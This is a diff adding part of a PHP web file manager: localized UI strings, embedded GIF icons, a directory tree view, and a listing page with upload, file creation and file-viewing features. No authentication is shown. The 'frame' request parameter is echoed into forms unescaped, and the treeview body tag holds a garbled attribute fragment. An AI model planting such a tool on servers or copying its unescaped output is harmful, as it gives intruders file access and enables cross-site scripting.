+		$words['read'] = '&#x010D;ten&#xED;'; $words['write'] = 'z&#xE1;pis'; $words['exec'] = 'spu&#x0161;t&#x011B;n&#xED;'; $words['change'] = 'zm&#x011B;nit'; $words['upload'] = 'nahr&#xE1;t'; $words['configure'] = 'nastaven&#xED;';
+		$words['yes'] = 'ano'; $words['no'] = 'ne';
+		$words['back'] = 'zp&#xE1;tky'; $words['setperms'] = 'nastav pr&#xE1;va';
+		$words['readingerror'] = 'Chyba p&#x0159;i &#x010D;ten&#xED; 1';
+		$words['permsset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 byla nastavena na 2.'; $words['permsnotset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 nelze  nastavit na 2.';
+		$words['uploaded'] = 'Soubor 1 byl ulo&#x017E;en do adres&#xE1;&#x0159;e 2.'; $words['notuploaded'] = 'Chyba p&#x0159;i ukl&#xE1;d&#xE1;n&#xED; souboru 1 do adres&#xE1;&#x0159;e 2.';
+		$words['moved'] = 'Soubor 1 byl p&#x0159;esunut do adres&#xE1;&#x0159;e 2.'; $words['notmoved'] = 'Soubor 1 nelze p&#x0159;esunout do adres&#xE1;&#x0159;e 2.';
+		$words['copied'] = 'Soubor 1 byl zkop&#xED;rov&#xE1;n do adres&#xE1;&#x0159;e 2.'; $words['notcopied'] = 'Soubor 1 nelze zkop&#xED;rovat do adres&#xE1;&#x0159;e 2.';
+		$words['created'] = '1 byl vytvo&#x0159;en.'; $words['notcreated'] = '1 nelze vytvo&#x0159;it.';
+		$words['deleted'] = '1 byl vymaz&#xE1;n.'; $words['notdeleted'] = '1 nelze vymazat.'; $words['suredelete'] = 'Skute&#x010D;n&#x011B; smazat 1?';
+		$words['saved'] = 'Soubor 1 byl ulo&#x017E;en.'; $words['notsaved'] = 'Soubor 1 nelze ulo&#x017E;it.';
+		$words['reset'] = 'zp&#x011B;t'; $words['clear'] = 'vy&#x010D;istit'; $words['save'] = 'ulo&#x017E;';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 nelze otev&#x0159;&#xED;t";
+		$words['addauth'] = 'p&#x0159;idat z&#xE1;kladn&#xED;-authentifikaci';
+		$words['username'] = 'U&#x017E;ivatelsk&#xE9; jm&#xE9;no'; $words['password'] = 'Heslo'; $words['add'] = 'p&#x0159;idat';
+		$words['treeon'] = 'Zobraz strom adres&#xE1;&#x0159;&#x016F;'; $words['treeoff'] = 'Skryj strom adres&#xE1;&#x0159;&#x016F;';
+		$words['symlink'] = 'Symbolick&#xFD; odkaz'; $words['createsymlink'] = 'vytvo&#x0159;it odkaz'; $words['target'] = 'C&#xED;l';
+		$words['reltarget'] = 'Relativni cesta k c&#xED;li';
+		$words['alreadyexists'] = 'Tento soubor u&#x017E; existuje.';
+		$words['overwrite'] = 'P&#x0159;epsat 1?';
+		$words['samefiles'] = '1 a 2 jsou identick&#xE9;l.';
+		break;
+	case 'it':
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Nome file'; $words['size'] = 'Dimensioni'; $words['permission'] = 'Permessi'; $words['functions'] = 'Funzioni';
+		$words['owner'] = 'Proprietario'; $words['group'] = 'Gruppo'; $words['other'] = 'Altro';
+		$words['create'] = 'crea'; $words['copy'] = 'copia'; $words['copyto'] = 'copia su'; $words['move'] = 'muovi'; $words['moveto'] = 'muove su'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'leggi'; $words['write'] = 'scrivi'; $words['exec'] = 'esegui'; $words['change'] = 'modifica'; $words['upload'] = 'upload'; $words['configure'] = 'configura';
+		$words['yes'] = 'si'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'imposta permessi';
+		$words['readingerror'] = 'Errore durante la lettura di 1';
+		$words['permsset'] = 'I permessi di 1 sono stati impostati a 2.'; $words['permsnotset'] = 'I permessi di 1 non possono essere impostati.';
+		$words['uploaded'] = '1 è stato uploadato su 2.'; $words['notuploaded'] = 'Errore durante l\'upload di 1 su 2.';
+		$words['moved'] = '1 è stato spostato su 2.'; $words['notmoved'] = '1 non può essere spostato su 2.';
+		$words['copied'] = '1 è stato copiato su 2.'; $words['notcopied'] = '1 non può essere copiato su 2.';
+		$words['created'] = '1 è stato creato.'; $words['notcreated'] = 'impossibile creare 1.';
+		$words['deleted'] = '1 è stato eliminato.'; $words['notdeleted'] = 'Impossibile eliminare 1.'; $words['suredelete'] = 'Confermi eliminazione di 1?';
+		$words['saved'] = '1 è stato salvato.'; $words['notsaved'] = 'Impossibile salvare 1.';
+		$words['reset'] = 'reimposta'; $words['clear'] = 'pulisci'; $words['save'] = 'salva';
+		$words['cantbeshown'] = "Impossibile visualizzare 1."; $words['sourceof'] = 'sorgente di 1';
+		$words['notopened'] = "Impossibile aprire 1";
+		$words['addauth'] = 'aggiunge autenticazione di base';
+		$words['username'] = 'Nome Utente'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Abilita vista ad albero'; $words['treeoff'] = 'Disabilita vista ad albero';
+		$words['symlink'] = 'Link simbolico'; $words['createsymlink'] = 'crea symlink'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Percorso relativo al target';
+		$words['alreadyexists'] = 'Questo file esiste già.';
+		$words['overwrite'] = 'Sovrascrivi 1?';
+		$words['samefiles'] = '1 e 2 sono identici.';
+		break;
+	case 'en':
+	default:
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Filename'; $words['size'] = 'Size'; $words['permission'] = 'Permission'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Owner'; $words['group'] = 'Group'; $words['other'] = 'Other';
+		$words['create'] = 'create'; $words['copy'] = 'copy'; $words['copyto'] = 'copy to'; $words['move'] = 'move'; $words['moveto'] = 'move to'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'read'; $words['write'] = 'write'; $words['exec'] = 'execute'; $words['change'] = 'change'; $words['upload'] = 'upload'; $words['configure'] = 'configure';
+		$words['yes'] = 'yes'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'set permission';
+		$words['readingerror'] = 'Error during read of 1';
+		$words['permsset'] = 'The permission of 1 were set to 2.'; $words['permsnotset'] = 'The permission of 1 could not be set.';
+		$words['uploaded'] = '1 has been uploaded to 2.'; $words['notuploaded'] = 'Error during upload of 1 to 2.';
+		$words['moved'] = '1 has been moved to 2.'; $words['notmoved'] = '1 could not be moved to 2.';
+		$words['copied'] = '1 has been copied to 2.'; $words['notcopied'] = '1 could not be copied to 2.';
+		$words['created'] = '1 has been created.'; $words['notcreated'] = '1 could not be created.';
+		$words['deleted'] = '1 has been deleted.'; $words['notdeleted'] = '1 could not be deleted.'; $words['suredelete'] = 'Really delete 1?';
+		$words['saved'] = '1 has been saved.'; $words['notsaved'] = '1 could not be saved.';
+		$words['reset'] = 'reset'; $words['clear'] = 'clear'; $words['save'] = 'save';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 couldn't be opened";
+		$words['addauth'] = 'add basic-authentification';
+		$words['username'] = 'Username'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Enable treeview'; $words['treeoff'] = 'Disable treeview';
+		$words['symlink'] = 'Symbolic link'; $words['createsymlink'] = 'create link'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Relative path to target';
+		$words['alreadyexists'] = 'This file already exists.';
+		$words['overwrite'] = 'Overwrite 1?';
+		$words['samefiles'] = '1 and 2 are identical.';
+	}
+	return $words;
+}
+
+function getimage ($iid) {
+	$image = 'GIF89a';
+	switch ($iid) {
+	case  1: $image .= "\23\0\22\0\242\4\0\0\0\0\377\377\377\314\314\314\231\231\231\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\23\0\22\0\0\3?H\272\334N \312\327@\270\30P%\273\237\213\205\215\244\240q\201\240\256\254:\234P\332\316o(\317l\215\342\255\36\363\71\230\5\270\362\15\211\2cr\300l:\231\60\310g\272\251Z\257\330l5\1\0;\0"; break;
+	case  2: $image .= "\23\0\22\0\221\2\0\0\0\0\314\314\314\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\23\0\22\0\0\2\64\224\217\251\2\355\233@\230\24@#\251v\357d\15V^H\6\26fr\352\312\230ehI\337;\305\63}6\364\206\356\365\350\63!V\304\323\345\210L*\227\220\2\0;\0"; break;
+	case  3: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\32\214o\200\313\355\255\236\234,\322+-\336K\363\357}[(^d9\235hP\0\0;\0"; break;
+	case  4: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234\217\251\313\355\17\15\230\224:\20\262\16\340j\241u\15\226\201\231\310\140\302\272rC\207\36d\140\272\343\27z\333yUU\4\14\12\207DF\1\0;\0"; break;
+	case  5: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2*\234\217\251\313\355\17\15\230\224:\20\262\16\340n\335\65\330\307y\302y\226]\210\214\37\273\270\33\254\310\340UU\321\316\367\376\317(\0\0;\0"; break;
+	case  6: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\33\214o\200\313\355\255\236\234,\322+-\336K\371\360q\224\46rd\211\235\350\270\76\5\0;\0"; break;
+	case  7: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2\60\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\206\204\304a\221R\0\0;\0"; break;
+	case  8: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\5\207B\42\245\0\0;\0"; break;
+	case  9: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\30\214o\200\313\355\255\236\234,\322+-\336K\371\360q\342H\226\346\211r\5\0;\0"; break;
+	case 10: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\12\207\304\242\260\0\0;\0"; break;
+	case 11: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\12\207\304\140\1\0;\0"; break;
+	case 12: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 13: $image .= "\21\0\15\0\221\3\0\314\0\0\377\377\377\231\231\231\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 14: $image .= "\21\0\15\0\242\4\0\231\231\231\377\377\377\0\0\0\314\0\0\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\21\0\15\0\0\3\71H\12\334\254\60\202@\353\213p\212-\302\4\330RYM8\15\3\305y\46\205\216,\204\316s\260\305\12M\217 6\5/[\247\47\1\246\140\304\314\210\63l\301,\46\207\224\230\0\0;\0"; break;
+	case 15: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\314\314\314\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2*\234\217\231\300\254\33b\4\317\264\213\235\225\274\13:\0\201@\226\46\11\212\347\372m\354\231\216o\31\317\264k\267a\216\36\331o(\0\0;\0"; break;
+	case 16: $image .= "\21\0\15\0\221\2\0\0\0\0\377\377\0\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\21\0\15\0\0\2,\224\217\251\2\355\260\14\10\263\322\65\203\336\32\246\7\66_\325P\245x\224\34\207J\344vzi\7wJf\342\62\202\263\21\23\372\11\17\5\0;\0"; break;
+	case  0:
+	default: $image .= "\23\0\22\0\200\1\0\0\0\0\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\20\214\217\251\313\355\17\243\234\264\332\213\263\336\274\327\2\0;\0"; break;
+	}
+	return $image;
+}
+
+function tree_hassubdirs ($path) {
+	if ($p = @opendir($path)) {
+		while (($filename = readdir($p)) !== FALSE) {
+			if (tree_isrealdir($path . $filename)) return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+function tree_isrealdir ($path) {
+	if (basename($path) != '.' && basename($path) != '..' && @is_dir($path) && !@is_link($path)) return TRUE; else return FALSE;
+}
+
+function treeview () {
+	global $self, $treeroot;
+	if (isset($_GET['plus']))	tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['plus']);
+	if (isset($_GET['minus']))	$dirchanged = tree_minus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['minus']); else $dirchanged = FALSE;
+	for ($d = $_SESSION['dir']; strlen($d = dirname($d)) != 1; tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $d));
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title>Treeview</title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+	-->
+	</style>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($dirchanged) echo(" '$self?noupdate=TRUE&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . "'))\""); ?>>
+	<table border="0" cellspacing="0" cellpadding="0">
+<?php
+	tree_showtree($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot, 0, tree_calculatenumcols($_SESSION['tree'], $treeroot, 0));
+?>
+	</table>
+</body>
+</html>
+<?php
+	return;
+}
+
+function frameset () {
+	global $self;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Frameset//EN">
+<html>
+<head>
+	<title><?php echo($self); ?></title>
+</head>
+<frameset cols="250,*">
+	<frame src="<?php echo("$self?frame=treeview&" . SID . '#' . urlencode($_SESSION['dir'])); ?>" name="treeview">
+	<frame src="<?php echo("$self?" . SID); ?>" name="webadmin">
+</frameset>
+</html>
+<?php
+	return;
+}
+
+function tree_calculatenumcols ($tree, $path, $col) {
+	static $numcols = 0;
+	if ($col > $numcols) $numcols = $col; 
+	if (isset($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$numcols = tree_calculatenumcols($tree, $path . $tree[$path][$i], $col + 1);
+		}
+	} 
+	return $numcols;
+}
+
+function tree_showtree ($tree, $hassubdirs, $path, $col, $numcols) {
+	global $self, $treeroot;
+	static $islast = array(0 => TRUE);
+	echo("	<tr>\n");
+	for ($i = 0; $i < $col; $i++) {
+		if ($islast[$i]) $iid = 0; else $iid = 3;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if ($hassubdirs[$path]) {
+		if (!empty($tree[$path])) { $action = 'minus'; $iid = 8; } else { $action = 'plus'; $iid = 7; }
+		if ($col == 0) $iid -= 3; else if ($islast[$col]) $iid += 3;
+		echo("		<td><a href=\"$self?frame=treeview&$action=" . urlencode($path) . '&dir=' . urlencode($_SESSION['dir']) . '&' . SID . '#' . urlencode($path) . '">');
+		echo("<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">");
+		echo("</a></td>\n");
+	} else {
+		if ($islast[$col]) $iid = 9; else $iid = 6;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if (@is_readable($path)) {
+		$a1 = "<a name=\"" . urlencode($path) . "\" href=\"$self?dir=" . urlencode($path) . '&' . SID . '" target="webadmin">';
+		$a2 = '</a>';
+	} else {
+		$a1 = $a2 = '';
+	}
+	if ($_SESSION['dir'] == $path) $iid = 2; else $iid = 1;
+	echo("		<td>$a1<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">$a2</td>\n");
+	$cspan = $numcols - $col + 1;
+	if ($cspan > 1) $colspan = " colspan=\"$cspan\""; else $colspan = '';
+	if ($col == $numcols) $width = ' width="100%"'; else $width = '';
+	echo("		<td$width$colspan nowrap>&nbsp;");
+	if ($path == $treeroot) $label = $path; else $label = basename($path);
+	echo($a1 . htmlentities($label) . $a2);
+	echo("</td>\n");
+	echo("	</tr>\n");
+	if (!empty($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			if (($i + 1) == sizeof($tree[$path])) $islast[$col + 1] = TRUE; else $islast[$col + 1] = FALSE;
+			tree_showtree($tree, $hassubdirs, $path . $tree[$path][$i], $col + 1, $numcols);
+		}
+	}
+	return;
+}
+
+function tree_plus (&$tree, &$hassubdirs, $p) {
+	if ($path = spath(realpath($p))) {
+		$tree[$path] = tree_getsubdirs($path);
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$subdir = $path . $tree[$path][$i];
+			if (empty($hassubdirs[$subdir])) $hassubdirs[$subdir] = tree_hassubdirs($subdir);
+		}
+	}
+	return;
+}
+
+function tree_minus (&$tree, &$hassubdirs, $p) {
+	$dirchanged = FALSE;
+	if ($path = spath(realpath($p))) {
+		if (!empty($tree[$path])) {
+			for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+				$subdir = $path . $tree[$path][$i] . '/';
+				if (isset($hassubdirs[$subdir])) $hassubdirs[$subdir] = NULL;
+			}
+			$tree[$path] = NULL;
+			if (substr($_SESSION['dir'], 0, strlen($path)) == $path) {
+				$_SESSION['dir'] = $path;
+				$dirchanged = TRUE;
+			}
+		}
+	}
+	return $dirchanged;
+}
+
+function tree_getsubdirs ($path) {
+	$subdirs = array();
+	if ($p = @opendir($path)) {
+		for ($i = 0; ($filename = readdir($p)) !== FALSE;) {
+			if (tree_isrealdir($path . $filename)) $subdirs[$i++] = $filename . '/';
+		}
+	}
+	sort($subdirs);
+	return $subdirs;
+}
+
+function show ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		header('Content-Type: ' . getmimetype($file));
+		if (@readfile($file) !== FALSE) return TRUE;
+	}
+	return FALSE;
+}
+
+function show_highlight ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		echo("<html>\n<head><title>");
+		echo(buildphrase(array('&quot;' . htmlentities(basename($file)) . '&quot;'), $words['sourceof']));
+		echo("</title></head>\n<body>\n<table cellpadding=\"4\" border=\"0\">\n<tr>\n<td>\n<code style=\"color: #999999\">\n");
+		$size = sizeof(file($file));
+		for ($i = 1; $i <= $size; $i++) printf("%05d<br>\n", $i);
+		echo("</code>\n</td>\n<td nowrap>\n");
+		$shown = @highlight_file($file);
+		echo("\n");
+		echo("</td>\n</tr>\n</table>\n");
+		echo("</body>\n");
+		echo("</html>");
+		if ($shown) return TRUE;
+	}
+	return FALSE;
+}
+
+function getmimetype ($file) {
+	/* $mime = 'application/octet-stream'; */
+	$mime = 'text/plain';
+	$ext = substr($file, strrpos($file, '.') + 1);
+	if (@is_readable('/etc/mime.types')) {
+		$f = fopen('/etc/mime.types', 'r');
+		while (!feof($f)) {
+			$line = fgets($f, 4096);
+			$found = FALSE;
+			$mim = strtok($line," \n\t");
+			$ex = strtok(" \n\t");
+			while ($ex && !$found) {
+				if (strtolower($ex) == strtolower($ext)) {
+					$found = TRUE;
+					$mime = $mim;
+					break;
+				}
+				$ex = strtok(" \n\t");
+			}
+			if ($found) break;
+		}
+		fclose($f);
+	}
+	return $mime;
+}
+
+function dirlisting ($inaframe = FALSE) {
+	global $self, $homedir, $words;
+	global $error, $notice;
+	$p = '&' . SID;
+	html_header($_SESSION['dir']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo("<a href=\"$self?dir=" . urlencode($homedir) . "$p\">" . $words['dir']); ?></a>:&nbsp;</td>
+				<td><input type="text" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>" size="<?php echo(textfieldsize($_SESSION['dir'])); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php if (@is_writable($_SESSION['dir'])) { ?>
+	<form action="<?php echo($self); ?>" method="post" enctype="multipart/form-data">
+	<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+	<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>&nbsp;</td>
+				<td><input type="file" name="upload">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['upload']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE">
+			</form>
+			<form action="<?php echo($self); ?>" method="get">
+			<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+			<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+			<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td>
+					<select name="type" size="1">
+					<option value="file"><?php echo($words['file']); ?>
+
+					<option value="dir" selected><?php echo($words['dir']); ?>
+
+					</select>&nbsp;
+				</td>
+				<td><input type="text" name="create">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	}
+	if (empty($_GET['sort'])) $sort = 'filename'; else $sort = $_GET['sort'];
+	$reverse = @$_GET['reverse'];
+	$GLOBALS['showsize'] = FALSE;
+	if ($files = dirtoarray($_SESSION['dir'])) {
+		$files = sortfiles($files, $sort, $reverse);
+		outputdirlisting($_SESSION['dir'], $files, $inaframe, $sort, $reverse);
+	} else {
+		perror(buildphrase('&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot', $words['readingerror']));
+	}
+	if ($inaframe) {
+		pnotice("<a href=\"$self?action=treeoff&" . SID . '" target="_top">' . $words['treeoff'] . '</a>');
+	} else {
+		pnotice("<a href=\"$self?action=treeon&" . SID . '" target="_top">' . $words['treeon'] . '</a>');
+	}
+	html_footer(FALSE);
+	return;
+}
+
+function dirtoarray ($dir) {
+	if ($dirstream = @opendir($dir)) {
+		for ($n = 0; ($filename = readdir($dirstream)) !== FALSE; $n++) {
+			$stat = @lstat($dir . $filename);
+			$files[$n]['filename']     = $filename;
+			$files[$n]['fullfilename'] = $fullfilename = relpathtoabspath($filename, $dir);
+			$files[$n]['is_file']      = @is_file($fullfilename);
+			$files[$n]['is_dir']       = @is_dir($fullfilename);
+			$files[$n]['is_link']      = $islink = @is_link($dir . $filename);
+			if ($islink) {
+				$files[$n]['readlink'] = @readlink($dir . $filename);
+				$files[$n]['linkinfo'] = linkinfo($dir . $filename);
+			}
+			$files[$n]['is_readable']   = @is_readable($fullfilename);
+			$files[$n]['is_writable']   = @is_writable($fullfilename);
+			$files[$n]['is_executable'] = @is_executable($fullfilename);
+			$files[$n]['permission']    = $islink ? 'lrwxrwxrwx' : octtostr(@fileperms($dir . $filename));
+			if (substr($files[$n]['permission'], 0, 1) != '-') {
+				$files[$n]['size'] = -1;
+			} else {
+				$files[$n]['size'] = @$stat['size'];
+				$GLOBALS['showsize'] = TRUE;
+			}
+			$files[$n]['owner']         = $owner = @$stat['uid'];
+			$files[$n]['group']         = $group = @$stat['gid'];
+			$files[$n]['ownername']     = @reset(posix_getpwuid($owner));
+			$files[$n]['groupname']     = @reset(posix_getgrgid($group));
+		}
+		closedir($dirstream);
+		return $files;
+	} else {
+		return FALSE;
+	}
+}
+
+function outputdirlisting ($dir, $files, $inaframe, $sort, $reverse) {
+	global $self, $words;
+	$uid = posix_getuid();
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+<?php
+	if ($inaframe) $p = '&notreeupdate=TRUE&'; $p = ''; $p .= SID . '&dir=' . urlencode($dir);
+	echo("	<tr>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><img src=\"$self?imageid=16\" width=\"17\" height=\"13\"></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=filename&reverse=" . (($sort == 'filename') ? !$reverse : 0) . "&$p\"><b>{$words['filename']}</b></a></td>\n");
+	if ($GLOBALS['showsize']) echo("		<td bgcolor=\"#EEEEEE\" align=\"right\"><a href=\"$self?sort=size&reverse=" . (($sort == 'size') ? !$reverse : 0) . "&$p\"><b>{$words['size']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=permission&reverse=" . (($sort == 'permission') ? !$reverse : 0) . "&$p\"><b>{$words['permission']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=owner&reverse=" . (($sort == 'owner') ? !$reverse : 0) . "&$p\"><b>{$words['owner']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=group&reverse=" . (($sort == 'group') ? !$reverse : 0) . "&$p\"><b>{$words['group']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><b>{$words['functions']}</b></td>\n");
+	echo("	</tr>\n");
+	$p = '&' . SID;
+	if ($GLOBALS['showsize']) $cspan = ' colspan="2"'; else $cspan = '';
+	foreach ($files as $file) {
+		echo("	<tr>\n");
+		if ($file['is_link']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=14\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">");
+			if ($file['is_dir']) echo('[ ');
+			echo($file['filename']);
+			if ($file['is_dir']) echo(' ]');
+			echo(' -&gt; ');
+			if ($file['is_dir']) {
+				echo('[ ');
+				if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['readlink']) . "$p\">");
+				echo(htmlentities($file['readlink']));
+				if ($file['is_readable']) echo('</a>');
+				echo(' ]');
+			} else {
+				if (dirname($file['readlink']) != '.') {
+					if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode(dirname($file['readlink'])) . "$p\">");
+					echo(htmlentities(dirname($file['readlink'])) . '/');
+					if ($file['is_readable']) echo('</a>');
+				}
+				if (strlen(basename($file['readlink'])) != 0) {
+					if ($file['is_file'] && $file['is_readable']) echo("<a href=\"$self?show=" . urlencode($file['readlink']) . "$p\">");
+					echo(htmlentities(basename($file['readlink'])));
+					if ($file['is_file'] && $file['is_readable']) echo('</a>');
+				}
+				if ($file['is_file'] && is_script($file['readlink'])) echo(" <a href=\"$self?showh=" . urlencode($file['readlink']) . "$p\">*</a>");
+			}
+			echo("</td>\n");
+		} elseif ($file['is_dir']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=15\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">[ ");
+			if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable']) echo('</a>');
+			echo(" ]</td>\n");
